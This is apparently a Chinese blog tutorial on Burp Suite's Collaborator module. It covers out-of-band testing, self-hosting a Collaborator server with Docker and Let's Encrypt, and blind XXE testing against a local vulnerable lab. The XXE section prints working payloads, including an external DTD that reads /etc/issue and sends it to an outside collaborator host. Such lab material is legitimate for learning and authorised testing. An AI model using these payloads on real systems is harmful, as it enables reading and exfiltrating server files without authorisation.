burpsuite collaborato模块简介 dns log、http_https log、smtp_smtps log

Burp suite Pro自从v1.6.15版本开始引入了一种名为Burp Collaborator的模块,该模块的作用简单的说就是集合了DNS log, http_https log和smtp_smtps log的记录器,有点类似国内的Ceye平台。

为了解释这个模块,burp引入了In-band attack与 out-band attack(带内与带外攻击)两个概念,两者最主要的区别在于数据的流动方向和参与者的数量。

带内攻击(In-band attack)是平时最常见的渗透测试模型:

C7FA7BD0-9AF7-4139-9001-9E7CD5CFDB60 2.png

通常在渗透测试过程中,无论是手工还是利用工具都是由攻击端发送含有payload的数据给被攻击端,然后校验被攻击端返回的数据。在这个模型中角色只有两个,流量只有两个信道。

带外攻击(out-band attack)则是Burp Collaborator的攻击模型:

3FCA238E-6FB0-4C6F-8209-E933EDABE9EF 2.png

在带外攻击中由攻击者发送有害流量到被攻击者,但是数据不会直接返回而是转向了第三方服务器,最后返回被攻击者。在带外攻击中,数据走三个信道,有三个角色。当然有时候第三方服务器和攻击者可以在同一个终端上

Burp Collaborator是一个c/s结构的服务器。在Project options->Misc->Burp Collaborator Server是配置、校验Burp Collaborator服务器的地方。

而在Burp->Burp Collaborator Client是查看服务器信息的地方。

0x2 Burp Collaborator Server的搭建

Burp Collaborator 是一个C/S结构的应用程序,C自然是burp的客户端,S则可以根据情况而定。

0x01 Burp自带的服务器

381AD5A9-3930-4E9F-9AC9-746ED154537E 2.pngF108D99E-8459-4EB8-A8B6-D24C5A7E428D 2.pngBBB8F93D-3CB0-4E8B-AAE6-BCA4EF014D50 2.png4C15AEBD-2349-42AC-9182-1A2F8EE2864D 2.pngAE96D3AC-192F-4EFC-907F-993C6E17A9DC 2.png6CA98CDF-D923-4529-8357-03B41256D773 2.png

0x02自建服务器

环境在https://github.com/0xs1riu5/Writeup/tree/master/0x15Burp%E7%9A%84Collaborator%E4%BB%8B%E7%BB%8D

Burp Collaborator允许自建服务器,而且自建Collaborator服务器是不需要Pro授权的。自建服务器根据具体的网络分为两种。

0x001 内网

优点:方便灵活,在无网络的情况下(比如CTF比赛和内网测试)也可以使用。

缺点:无DNS log,https log和 smtps log。

搭建内网环境已经封装成了docker,前往Docker_Server_Inner目录下:

docker-compose build
docker-compose up -d

2A980454-8C06-4489-AFB4-EE9F87C6FD01 2.png58710DE1-F9AC-4F34-9860-EC0B67C28B78 2.pngF3735BC0-1F39-44E9-96BF-F141F9C184B7 2.png42977B01-575A-4B0A-B555-CF2FE1D56C60 2.pngB7A5F83E-31F8-42E5-8341-B57B04B03E92 2.png

0x002 外网

与内网搭建相比,外网就比较麻烦了。

所需材料:

VPS

域名:(从godaddy买的,然后移交到了cloudflare下进行控制),以my-subdomain-for-burp.luffy.com为例(假域名,需要改成自己的二级域名)

LetsEncrypt(免费的ssl加密证书)

Burp Suite Pro

Docker

0x0001 配置SSL证书

wget https://raw.githubusercontent.com/certbot/certbot/master/certbot-auto -O /usr/local/bin/certbot-auto
chmod a+x /usr/local/bin/certbot-auto
certbot-auto
certbot-auto certonly -d my-subdomain-for-burp.luffy.com -d *.my-subdomain-for-burp.luffy.com  --server https://acme-v02.api.letsencrypt.org/directory --manual --agree-tos  --email=you-email@qq.com --manual-public-ip-logging-ok --preferred-challenges dns-01

4037451E-9ECA-4D99-BF10-AB8FEC44176B 2.png

最后生成的证书默认是放在/etc/letsencrypt/目录下的。

然后前往cloudflare添加两个TXT记录: 

 

_acme-challenge.my-subdomain-for-burp.luffy.com -> en9Gf... _

acme-challenge.my-subdomain-for-burp.luffy.com -> Ffzzws... 

168E4A46-EA4E-4384-A3C8-ECB856F77A44 2.png

0x0002 Burp Collaborator Server的配置

A39F09DA-CC17-4CA7-AA28-90263E2E4F56 2.png

将域名和IP改成对应的二级域名和VPS公网IP地址:

docker-compose build
docker-compose up -d

16898577-11B4-4192-BD95-1D7FDA096EC4 2.png

0x0003 修改A记录和NS记录

1.NS记录指向ns1.my-subdomain-for-burp.luffy.com;

2.A记录指向公网IP。

BC3D1EB4-DAFB-4707-9164-CFFB2E3DD720 2.png09448415-E6DA-4B94-91D9-904F5E738544 2.png2CF5A69C-6408-4347-B876-B76572C1135A 2.png42178470-41B5-44CF-B002-7A4B65FF63DD 2.png

测试成功。

但是Burp Collaborator有一个缺点就是数据无法持久化,Burp Suite 不可能保存Collaborator的上下文。关闭client那么所有的数据就丢失了。现在也只能期待以后Burp会添加这方面的功能了。

现在为止有一个很好的折衷的方案就是在自建的服务器上开启DEBUG功能(我在docker中已经启用了),查看log信息,Burp自带的服务器就不可能实现了。

168E4A46-EA4E-4384-A3C8-ECB856F77A44 2.png

我把日志内容导向到了logs目录下的burp.log文件。

0x3 漏洞测试

0x01 XXE

前往Docker_vul_JavaVulnerableLab,这个XXE是回显式的,不过我按照盲注的方式测试:

docker-compose build
docker-compose up -d

启用之后访问 http://127.0.0.1:8080/vulnerability/Injection/xxe.jsp

0D2ADFB3-BF5E-48B9-BD73-57568AA5FD30.png

忙注的校验漏洞的PAYLOAD:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE ANY [<!ENTITY hello SYSTEM "http://cfv17n86l6ri6atl5kbebbxaa1gr4g.burpcollaborator.net">]><users><username>Neo&hello;</username><email>neo@matrix</email></users>

BF60D28F-DF32-49A3-9427-A23C8D56127D.png

实现文件读取。

新建一个evil.xml文件,放在web目录下:

<!ENTITY % file SYSTEM "file:///etc/issue">
<!ENTITY % ent "<!ENTITY data SYSTEM 'http://tzwwz7vl66d1gir1nzihuc4hd8jy7n.burpcollaborator.net/%file;'>">

然后修改POST包:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % xxegsd76 SYSTEM "http://172.168.46.145:6080/evil.xml"> %xxegsd76; %ent; ]><users><username>Neo&data;</username><email>neo@matrix</email></users>

5754DB47-E47C-466B-80B2-60375DA3FA19.png

引用链接

Introducing Burp Collaborator | Blog

Burpsuite之Burp Collaborator模块介绍 - 小小leo - 博客园

Running Your Instance of Burp Collaborator Server - Fabio Pires

Deploying a private Burp Collaborator server

Burp Collaborator资源整合 - blacksunny - 博客园

DNSLog在渗透中的使用 | AdminTony's Blog

从 blind XXE 到读取根目录文件

XXE總結 - 掃文資訊

XXE总结(小部分自己的)

從 blind XXE 到讀取根目錄文件 - 掃文資訊

Burp Suite是一种流行的Web应用程序安全测试工具,它具有多个功能模块,用于执行各种安全测试任务。以下是Burp Suite的主要功能模块的简要介绍: 1. Proxy(代理):作为Burp Suite的核心模块之一,Proxy模块允许您拦截和修改HTTPHTTPS请求。您可以使用代理来检查传入和传出的请求,修改参数、头部或正文,并观察应用程序的响应。 2. Spider(爬虫):Spider模块用于自动发现应用程序中的链接和目录。它会遍历应用程序,收集所有可访问的页面,并将其添加到目标范围中供进一步测试使用。 3. Scanner(扫描器):Scanner模块用于自动执行漏洞扫描。它可以检测常见的Web应用程序漏洞,如SQL注入、跨站脚本(XSS)和跨站请求伪造(CSRF)等。 4. Intruder(入侵者):Intruder模块可用于自动执行定制的攻击向量,例如暴力破解、参数枚举和字典攻击。您可以定义不同的payload和攻击参数,并对目标进行大规模攻击。 5. Repeater(重复器):Repeater模块允许您对单个请求进行手动修改和重复发送。使用它可以测试不同的请求参数和值,以检测应用程序的行为和漏洞。 6. Sequencer(序列器):Sequencer模块用于分析应用程序生成的随机数或会话令牌的质量。它会对收集的数据进行统计和熵分析,以帮助您评估其预测性和安全性。 7. Decoder(解码器):Decoder模块可用于对请求和响应中的数据进行编码和解码。它支持多种编码格式,例如URL编码、Base64编码和HTML实体编码。 8. Comparer(比较器):Comparer模块可用于比较两个请求或响应之间的差异。这对于发现应用程序中的潜在漏洞或错误非常有用。 这些功能模块使Burp Suite成为一种强大的工具,可帮助安全测试人员识别和验证Web应用程序中的漏洞,并提供建议和修复建议。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值